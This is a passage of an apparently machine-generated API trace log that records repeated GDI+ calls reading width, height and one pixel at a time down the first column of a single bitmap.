GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=0, color=0x4de220) returned 0x0 [0174.704] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.704] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.704] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=1, color=0x4de220) returned 0x0 [0174.705] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=2, color=0x4de220) returned 0x0 [0174.706] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=3, color=0x4de220) returned 0x0 [0174.706] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=4, color=0x4de220) returned 0x0 [0174.706] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=5, color=0x4de220) returned 0x0 [0174.706] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=6, color=0x4de220) returned 0x0 [0174.706] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.706] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.706] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=7, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.707] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=8, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.707] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=9, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.707] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=10, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.707] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=11, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.707] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=12, color=0x4de220) returned 0x0 [0174.707] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.707] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=13, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.708] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=14, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.708] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=15, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.708] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=16, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.708] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=17, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.708] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.708] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=18, color=0x4de220) returned 0x0 [0174.708] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.709] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=19, color=0x4de220) returned 0x0 [0174.709] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.709] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=20, color=0x4de220) returned 0x0 [0174.709] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.709] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=21, color=0x4de220) returned 0x0 [0174.709] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.709] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=22, color=0x4de220) returned 0x0 [0174.709] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.709] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=23, color=0x4de220) returned 0x0 [0174.709] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.709] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.710] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=24, color=0x4de220) returned 0x0 [0174.710] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.710] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.710] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=25, color=0x4de220) returned 0x0 [0174.710] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.710] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.710] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=26, color=0x4de220) returned 0x0 [0174.710] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.710] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.710] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=27, color=0x4de220) returned 0x0 [0174.710] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.710] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.710] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=28, color=0x4de220) returned 0x0 [0174.710] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.710] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.711] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=29, color=0x4de220) returned 0x0 [0174.711] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.711] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.711] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=30, color=0x4de220) returned 0x0 [0174.711] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.711] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.711] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=31, color=0x4de220) returned 0x0 [0174.711] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.711] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.711] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=32, color=0x4de220) returned 0x0 [0174.711] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.711] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.711] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=33, color=0x4de220) returned 0x0 [0174.711] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.712] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=34, color=0x4de220) returned 0x0 [0174.712] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.712] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=35, color=0x4de220) returned 0x0 [0174.712] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.712] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=36, color=0x4de220) returned 0x0 [0174.712] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.712] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=37, color=0x4de220) returned 0x0 [0174.712] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.712] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=38, color=0x4de220) returned 0x0 [0174.712] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.712] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=39, color=0x4de220) returned 0x0 [0174.713] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.713] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=40, color=0x4de220) returned 0x0 [0174.713] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.713] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=41, color=0x4de220) returned 0x0 [0174.713] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.713] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=42, color=0x4de220) returned 0x0 [0174.713] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.713] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=43, color=0x4de220) returned 0x0 [0174.713] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.713] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.713] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=44, color=0x4de220) returned 0x0 [0174.714] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.714] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.714] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=45, color=0x4de220) returned 0x0 [0174.714] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.714] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.714] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=46, color=0x4de220) returned 0x0 [0174.714] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.714] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.714] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=47, color=0x4de220) returned 0x0 [0174.714] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.714] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.714] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=48, color=0x4de220) returned 0x0 [0174.714] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.714] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.714] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=49, color=0x4de220) returned 0x0 [0174.715] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.715] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.715] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=50, color=0x4de220) returned 0x0 [0174.715] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.715] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.715] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=51, color=0x4de220) returned 0x0 [0174.715] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.715] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.715] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=52, color=0x4de220) returned 0x0 [0174.715] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.715] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.715] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=53, color=0x4de220) returned 0x0 [0174.715] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.715] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.715] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=54, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=55, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=56, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=57, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=58, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=59, color=0x4de220) returned 0x0 [0174.716] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.716] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.716] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=60, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=61, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=62, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=63, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=64, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=65, color=0x4de220) returned 0x0 [0174.717] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.717] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.717] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=66, color=0x4de220) returned 0x0 [0174.718] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.718] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.718] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=67, color=0x4de220) returned 0x0 [0174.718] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.718] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.718] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=68, color=0x4de220) returned 0x0 [0174.718] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.718] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.718] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=69, color=0x4de220) returned 0x0 [0174.718] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.718] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.718] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=70, color=0x4de220) returned 0x0 [0174.718] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.719] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.719] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=71, color=0x4de220) returned 0x0 [0174.719] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.719] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.720] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=72, color=0x4de220) returned 0x0 [0174.720] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.720] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.720] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=73, color=0x4de220) returned 0x0 [0174.720] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.720] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.720] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=74, color=0x4de220) returned 0x0 [0174.720] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.720] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=75, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.721] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=76, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.721] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=77, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.721] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=78, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.721] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=79, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.721] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.721] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=80, color=0x4de220) returned 0x0 [0174.721] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=81, color=0x4de220) returned 0x0 [0174.722] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=82, color=0x4de220) returned 0x0 [0174.722] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=83, color=0x4de220) returned 0x0 [0174.722] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=84, color=0x4de220) returned 0x0 [0174.722] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=85, color=0x4de220) returned 0x0 [0174.722] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.722] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.722] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=86, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=87, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=88, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=89, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=90, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=91, color=0x4de220) returned 0x0 [0174.723] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.723] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.723] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=92, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=93, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=94, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=95, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=96, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=97, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=98, color=0x4de220) returned 0x0 [0174.724] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.724] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.724] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=99, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=100, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=101, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=102, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=103, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=104, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.725] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=105, color=0x4de220) returned 0x0 [0174.725] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.725] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=106, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.726] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=107, color=0x4de220) returned 0x0 [0174.726] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.726] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) 